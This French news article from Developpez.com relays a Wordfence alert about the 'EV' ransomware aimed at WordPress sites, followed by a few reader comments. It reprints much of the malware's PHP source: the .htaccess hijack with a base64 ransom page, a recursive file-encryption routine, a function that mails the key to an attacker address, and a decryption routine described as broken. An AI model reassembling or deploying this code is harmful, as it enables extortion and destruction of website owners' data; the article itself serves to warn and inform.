Vous êtes nouveau sur Developpez.com ? Créez votre compte ou connectez-vous afin de pouvoir participer !

Vous devez avoir un compte Developpez.com et être connecté pour pouvoir participer aux discussions.

Vous n'avez pas encore de compte Developpez.com ? Créez-en un en quelques instants, c'est entièrement gratuit !

Si vous disposez déjà d'un compte et qu'il est bien activé, connectez-vous à l'aide du formulaire ci-dessous.

Identifiez-vous
Identifiant
Mot de passe
Mot de passe oublié ?
Créer un compte

L'inscription est gratuite et ne vous prendra que quelques instants !

Je m'inscris !

Alerte sécurité : le ransomware EV, une menace grandissante pour les sites WordPress
Depuis le mois dernier

Le , par Patrick Ruiz

25PARTAGES

8  0 
Wordfence, l’équipe en charge de la sécurité des sites WordPress, vient de publier une alerte sécurité. Elle fait état de ce qu’un ransomware surnommé EV (par l’équipe Wordfence) cible de plus en plus les sites WordPress. La deuxième version (dont le code source a été publié sur GitHub depuis juillet 2016) est utilisée par des attaquants pour essayer de s’en prendre à des sites WordPress depuis le mois passé.

Un examen du code source révèle que l’attaque commence par une prise en otage du fichier .htaccess (comme en témoigne le bout de code source ci-dessous) créé automatiquement par WordPress lors de l’installation d’un site. Le fichier .htaccess étant renommé, le site est pratiquement muselé, puisque le serveur se retrouve orphelin de son fichier de configuration. Ne reste alors qu’à mettre les fichiers du site hors d’atteinte par la victime.

Code : Sélectionner tout
1
2
3
4
5
6
7
8
9
10
11
public function shcpackInstall(){
    if(!file_exists(".htashor7cut")){
      rename(".htaccess", ".htashor7cut");
      if(fwrite(fopen('.htaccess', 'w'), "#Bug7sec Team\r\nDirectoryIndex shor7cut.php\r\nErrorDocument 404 /shor7cut.php")){
            echo '<i class="fa fa-thumbs-o-up" aria-hidden="true"></i> .htaccess (Default Page)<br>';
      }
      if(file_put_contents("shor7cut.php", base64_decode("PCFET0NUWVBFIGh0bWw+DQo8aHRtbD4NCjxoZWFkPg0KICAgPHRpdGxlPkF3ZXNvbWVXYXJlPC90aXRsZT4NCjxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+DQpib2R5IHsNCiAgICBiYWNrZ3JvdW5kOiAjMUExQzFGOw0KICAgIGNvbG9yOiAjZTJlMmUyOw0KfQ0KYXsNCiAgIGNvbG9yOmdyZWVuOw0KfQ0KPC9zdHlsZT4NCjwvaGVhZD4NCjxib2R5Pg0KPGNlbnRlcj4NCjxwcmU+DQogICAgICANCiAgICAgICAgICAgIC4tIiItLg0KICAgICAgICAgICAvIC4tLS4gXA0KICAgICAgICAgIC8gLyAgICBcIFwNCiAgICAgICAgICB8IHwgICAgfCB8DQogICAgICAgICAgfCB8Li0iIi0ufA0KICAgICAgICAgLy8vYC46Ojo6LmBcDQogICAgICAgIHx8fCA6Oi8gIFw6OiA7DQogICAgICAgIHx8OyA6OlxfXy86OiA7DQogICAgICAgICBcXFwgJzo6OjonIC8NCiAgICAgICAgICBgPSc6LS4uLSdgDQpZb3VyIHNpdGUgaXMgbG9ja2VkLCBwbGVhc2UgY29udGFjdCB2aWEgZW1haWw6DQogICAgIC1bIDxmb250IGNvbG9yPSJncmVlbiI+dG8xMzM3ZGF5W2F0XWdtYWlsLmNvbTwvZm9udD4gXS0NCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NClRoaXMgaXMgYSBub3RpY2Ugb2YgPGEgaHJlZj0iaHR0cHM6Ly9lbi53aWtpcGVkaWEub3JnL3dpa2kvUmFuc29td2FyZSI+cmFuc29td2FyZTwvYT4uPGJyPg0KSG93IHRvIHJlc3RvcmUgdGhlIGJlZ2lubmluZz8NClBsZWFzZSBjb250YWN0IHVzIHZpYSBlbWFpbCBsaXN0ZWQNCjwvcHJlPg0KPC9jZW50ZXI+DQo8L2JvZHk+DQo8L2h0bWw+"))){
            echo '<i class="fa fa-thumbs-o-up" aria-hidden="true"></i>  shor7cut.php (Default Page)<br>';
      }
    }
   }

Le ransomware dispose d’une fonction de parcours (cf. fonction shcdirs ci-dessous) des répertoires de l’arborescence du site et de chiffrement des fichiers en leur sein. Les fichiers sont chiffrés en utilisant l’algorithme Rijndael 128 via un appel à la fonction shcEnCry (cf. code ci-dessous). Pour chacun des répertoires parcourus, l’attaquant reçoit (via un appel à la fonction report ci-dessous) la clé de chiffrement utilisée par courriel via une adresse à configurer d’avance.

Code : Sélectionner tout
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
public function shcdirs($dir,$method,$key){
        switch ($method) {
          case '1':
            deRanSomeware::shcpackInstall();
          break;
          case '2':
           deRanSomeware::shcpackUnstall();
          break;
        }
        foreach(scandir($dir) as $d)
        {
            if($d!='.' && $d!='..')
            {
                $locate = $dir.DIRECTORY_SEPARATOR.$d;
                if(!is_dir($locate)){
                   if(  deRanSomeware::kecuali($locate,"AwesomeWare.php")  && deRanSomeware::kecuali($locate,".png")  && deRanSomeware::kecuali($locate,".htaccess")  && deRanSomeware::kecuali($locate,"shor7cut.php") &&  deRanSomeware::kecuali($locate,"index.php") && deRanSomeware::kecuali($locate,".htashor7cut") ){
                     switch ($method) {
                        case '1':
                           deRanSomeware::shcEnCry($key,$locate);
                           deRanSomeware::shcEnDesDirS($locate,"1");
                        break;
                        case '2':
                           deRanSomeware::shcDeCry($key,$locate);
                           deRanSomeware::shcEnDesDirS($locate,"2");
                        break;
                     }
                   }
                }else{
                  deRanSomeware::shcdirs($locate,$method,$key);
                }
            }
            deRanSomeware::plus();
        }
        deRanSomeware::report($key);
   }
Code : Sélectionner tout
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
public function shcEnCry($key,$locate){
      $data = file_get_contents($locate);
      $iv = mcrypt_create_iv(
          mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC),
          MCRYPT_DEV_URANDOM
      );
      $encrypted = base64_encode(
          $iv .
          mcrypt_encrypt(
              MCRYPT_RIJNDAEL_128,
              hash('sha256', $key, true),
              $data,
              MCRYPT_MODE_CBC,
              $iv
          )
      );
      if(file_put_contents($locate,  $encrypted )){
         echo '<i class="fa fa-lock" aria-hidden="true"></i> <font color="#00BCD4">Locked</font> (<font color="#40CE08">Success</font>) <font color="#FF9800">|</font> <font color="#2196F3">'.$locate.'</font> <br>';
      }else{
         echo '<i class="fa fa-lock" aria-hidden="true"></i> <font color="#00BCD4">Locked</font> (<font color="red">Failed</font>) <font color="#FF9800">|</font> '.$locate.' <br>';
      }
   }
Code : Sélectionner tout
1
2
3
4
5
6
7
8
9
public function report($key){
        $message.= "=========     Ronggolawe Ransomware    =========\n";
        $message.= "Website : ".$_SERVER['HTTP_HOST'];
        $message.= "Key     : ".$key;
        $message.= "========= Ronggolawe (2016) Ransomware =========\n";
        $subject = "Report Ransomeware";
        $headers = "From: Ransomware <ransomeware@shor7cut.today>\r\n";
        mail("-- YOUR EMAIL --",$subject,$message,$headers);
   }

Une fois le processus de chiffrement des fichiers achevé, la victime a droit au classique écran de demande de la rançon via lequel il pourra saisir une clé de chiffrement fournie par les attaquants en cas de paiement de la rançon. L’équipe Wordfence déconseille cependant aux victimes potentielles de procéder au paiement.


« Le ransomware documenté ici est incomplet parce que la fonction dédiée au déchiffrement des fichiers (cf.fonction shcDeCry ci-dessous) ne joue pas son rôle », a déclaré l’équipe Wordfence qui ajoute que « si vous êtes affecté par ce dernier ne procédez pas au paiement de la rançon puisqu’il est peu probable que les attaquants soient en réalité capables de déchiffrer vos fichiers. »

Code : Sélectionner tout
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
   public function shcDeCry($key,$locate){
      $data = base64_decode( file_get_contents($locate) );
      $iv = substr($data, 0, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC));
      $decrypted = rtrim(
          mcrypt_decrypt(
              MCRYPT_RIJNDAEL_128,
              hash('sha256', $key, true),
              substr($data, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)),
              MCRYPT_MODE_CBC,
              $iv
          ),
          "\0"
      );
      if(file_put_contents($locate,  $decrypted )){
         echo '<i class="fa fa-unlock" aria-hidden="true"></i> <font color="#FFEB3B">Unlock</font> (<font color="#40CE08">Success</font>) <font color="#FF9800">|</font> <font color="#2196F3">'.$locate.'</font> <br>';
      }else{
         echo '<i class="fa fa-unlock" aria-hidden="true"></i> <font color="#FFEB3B">Unlock</font> (<font color="red">Failed</font>) <font color="#FF9800">|</font> <font color="#2196F3">'.$locate.'</font> <br>';
      }
   }

« Quand bien même ils vous fourniraient une clé, vous aurez besoin d’un développeur PHP expérimenté pour vous aider à réparer leur code afin de tirer profit de la clé et déchiffrer les fichiers », a ajouté l’équipe Wordfence.

Le malheur des potentielles victimes semble faire les affaires de l’équipe managériale de WordPress puisque la seule solution proposée par cette dernière est de se doter du pare-feu Wordfence disponible uniquement pour les utilisateurs premium.

Sources  : Wordfence, GitHub

Et vous ?

Qu’en pensez-vous ?
Développez-vous des sites avec WordPress ? Quelles précautions comptez-vous prendre pour éviter d’être victime de cette menace ?

Voir aussi :

WordPress est de loin le CMS le plus ciblé par les cyberattaques en grande partie en raison du mauvais entretien et la négligence des webmasters

Une erreur dans cette actualité ? Signalez-le nous !

Avatar de solstyce39
Membre actif https://www.developpez.com
Le 16/08/2017 à 17:45
Je n'ai pas compris comment le fichier atterrissait sur le site Wordpress (je suppose un plug-in verollé ?)

Après pour un CMS, tant que l'on ne touche pas à la BDD, avoir les fichiers cryptés n'est pas un gros problème en soit, il suffit d'avoir une sauvegarde et de la restaurer.

Il peut y avoir un problème sur des images ou des PJ, mais le site en lui-même ne doit pas rester inaccessible bien longtemps .

Pour le reste, modifier les accès au fichier .htaccess semble résoudre une partie du problème.
1  0 
Avatar de
https://www.developpez.com
Le 16/08/2017 à 19:00
On pourrai simplement bloqué la fonction "scandir" et ça règle le problème, pour autant bien sûr quelle ne soit pas utilisée dans WordPress.
0  0 
Avatar de Volgaan
Membre confirmé https://www.developpez.com
Le 17/08/2017 à 14:05
Ça manque de détails. Comment ce ransomware se propage-t-il ? Via une faille ? Un extension vérolée ? Que signifie prendre en otage le fichier .htaccess ?
0  0